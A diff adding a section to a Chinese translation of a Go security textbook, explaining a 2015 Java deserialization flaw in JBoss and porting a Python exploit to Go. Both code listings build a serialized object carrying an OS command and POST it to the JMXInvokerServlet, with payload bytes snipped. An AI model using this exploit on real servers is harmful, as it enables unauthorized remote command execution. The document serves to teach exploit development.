ch-9 Porting an Exploit from Python

--- a/ch-9/第9章：编写并移植漏洞代码.md
+++ b/ch-9/第9章：编写并移植漏洞代码.md
@@ -291,3 +291,97 @@ $ go run main.go
 
 诚然，在后面的章节中，尤其是在我们讨论底层Windows交互时，其中一些包被证明更有用，但是我们已经包含了这个列表供查看。我们不会尝试详细介绍这些包，而是展示如何通过使用其中一些包来移植现有漏洞开发程序。
 
+#### 从Python移植漏洞
+
+在第一个例子中，将移植2015年发布的Java反序列化漏洞。该漏洞归类为几个CVE，它影响常见应用程序，服务器和库中Java对象的反序列化。反序列化库引入了此漏洞，该库无法在服务器端执行之前的验证输入（漏洞的常见原因）。我们将重点放在开发流行的Java Enterprise Edition应用程序服务器JBoss上。在 *https://github.com/roo7break/serialator/blob/master/serialator.py* 上，有一个Python脚本，其中包含可在多个应用程序中使用此漏洞的逻辑。清单9-3提供需要复制的逻辑。
+
+```python
+def jboss_attack(HOST, PORT, SSL_On, _cmd):
+	# The below code is based on the jboss_java_serialize.nasl script within Nessus 
+    """
+	This function sets up the attack payload for JBoss
+	"""
+	body_serObj = hex2raw3("ACED000573720032737--SNIPPED FOR BREVITY--017400")
+	
+    cleng = len(_cmd)
+	body_serObj += chr(cleng) + _cmd
+	body_serObj += hex2raw3("740004657865637571--SNIPPED FOR BREVITY--7E003A")
+	
+    if SSL_On:
+		webservice = httplib2.Http(disable_ssl_certificate_validation=True) 
+        URL_ADDR = "%s://%s:%s" % ('https',HOST,PORT)
+	else:
+		webservice = httplib2.Http()
+		URL_ADDR = "%s://%s:%s" % ('http',HOST,PORT)
+		headers = {"User-Agent":"JBoss_RCE_POC", 
+                   "Content-type":"application/x-java-serialized-object--SNIPPED FOR BREVITY--", 
+                   "Content-length":"%d" % len(body_serObj)
+		}
+	resp, content = webservice.request(
+		URL_ADDR+"/invoker/JMXInvokerServlet", 
+        "POST",
+		body=body_serObj,
+		headers=headers)
+	# print provided response.
+	print("[i] Response received from target: %s" % resp)
+
+```
+
+清单 9-3: Python 序列化开发代码
+
+让我们看下这里用到了那些东西。该函数接收host，port，SSL标示和操作系统命令作为参数。为了构建正确的请求，该函数必须创建一个表示序列化Java对象的有效负载。该脚本首先将一系列字节硬编码到名为 `body_serObj` 的变量中。为了简洁起见，已将这些字节删除，但请注意，它们在代码中以字符串值的形式表示。这是一个十六进制字符串，需要将其转换为字节数组，以便该字符串的两个字符成为单个字节的表示形式。例如，您需要将`AC`转换为十六进制字节 `\ xAC`。为了完成此转换，代码调用了 `hex2raw3` 函数。只要了解了十六进制字符串是怎么回事，关于此函数基础实现的细节就无关紧要了。
+
+接下来，脚本计算操作系统命令的长度，然后将长度和命令追加到 `body_serObj` 变量。该脚本通过附加以表示Java序列化对象其余部分的其他数据来完成有效负载的构造，该对象以JBoss可以处理的格式。构造有效负载后，脚本将构建URL并设置SSL以忽略无效证书（如有必要）。然后，设置所需的 `Content-Type`和`Content-Length` HTTP标头，并将恶意请求发送到目标服务器。
+
+该脚本中的大多数内容对于我们来说并不陌生，因为在上一章已经介绍了大部分内容。现在，只需以Go习惯的方式进行等效的函数调用即可。清单9-4是该漏洞的Go版本。
+
+```go
+func jboss(host string, ssl bool, cmd string) (int, error) {
+	serializedObject, err := hex.DecodeString("ACED0005737--SNIPPED FOR BREVITY--017400")
+    if err != nil {
+        return 0, err
+    }
+	serializedObject = append(serializedObject, byte(len(cmd)))
+	serializedObject = append(serializedObject, []byte(cmd)...)
+	afterBuf, err := hex.DecodeString("740004657865637571--SNIPPED FOR BREVITY--7E003A")
+    if err != nil {
+        return 0, err
+    }
+	serializedObject = append(serializedObject, afterBuf...)
+
+    var client *http.Client var url string
+	if ssl {
+		client = &http.Client{ 
+            Transport: &http.Transport{
+				TLSClientConfig: &tls.Config{ 
+                    InsecureSkipVerify: true,
+				}, 
+            },
+		}
+		url = fmt.Sprintf("https://%s/invoker/JMXInvokerServlet", host) 
+    } else {
+		client = &http.Client{}
+		url = fmt.Sprintf("http://%s/invoker/JMXInvokerServlet", host) 
+    }
+	req, err := http.NewRequest("POST", url, bytes.NewReader(serializedObject)) 
+    if err != nil {
+        return 0, err
+    }
+    req.Header.Set(
+        "User-Agent",
+		"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko") 
+    req.Header.Set(
+		"Content-Type",
+		"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue")
+    resp, err := client.Do(req)
+    if err != nil {
+        return 0, err
+    }
+	return resp.StatusCode, nil 
+}
+```
+
+清单 9-4: 和原始Python序列化漏洞等效的Go代码 (/ch-9/jboss/main.go)
+
+该代码几乎逐行复制了Python版本。基于此，我们将注释设置为与Python对应的注释一致，因此可以按照我们所做的更改。
+
